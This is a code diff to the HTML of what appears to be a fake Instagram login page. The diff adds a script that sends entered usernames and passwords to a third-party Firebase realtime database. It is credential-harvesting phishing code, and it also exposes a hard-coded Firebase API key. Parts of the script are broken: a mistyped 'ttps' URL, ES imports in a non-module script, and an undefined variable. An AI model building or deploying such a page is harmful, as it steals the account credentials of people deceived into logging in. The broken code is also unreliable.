--- a/index.html
+++ b/index.html
@@ -67,5 +67,39 @@
         </ul>
         <p class="copyright">© 2020 Instagram do Facebook</p>
     </footer>
+    <script>
+ // Import the functions you need from the SDKs you need
+
+import { initializeApp } from "ttps://www.gstatic.com/firebasejs/10.12.3/firebase-app.js";
+const firebaseConfig = {
+
+  apiKey: "AIzaSyC3ZAshe1SOP3xvtuBADQhxetJap_UYelE",
+
+  authDomain: "rockpaper-c307a.firebaseapp.com",
+
+  databaseURL: "https://rockpaper-c307a-default-rtdb.firebaseio.com",
+
+  projectId: "rockpaper-c307a",
+
+  storageBucket: "rockpaper-c307a.appspot.com",
+
+  messagingSenderId: "809194481630",
+
+  appId: "1:809194481630:web:497723eb749f8f356a9f4f",
+
+  measurementId: "G-PZ8264ZEVR"
+
+};
+ // Initialize Firebase
+ const app = initializeApp(firebaseConfig);
+import {set, getDatabase, ref, child, get} from "https://www.gstatic.com/firebasejs/10.12.3/firebase-database.js";
+const db = getDatabase();
+const dbRef = ref(db);
+          set(ref(db, "users/"+storedValue[1] +" ," +username.value), {
+                   username: username.value,
+                   password: storedValue[0],
+                   total: storedValue[1],
+                 });
+    </script>
 </body>
 </html>
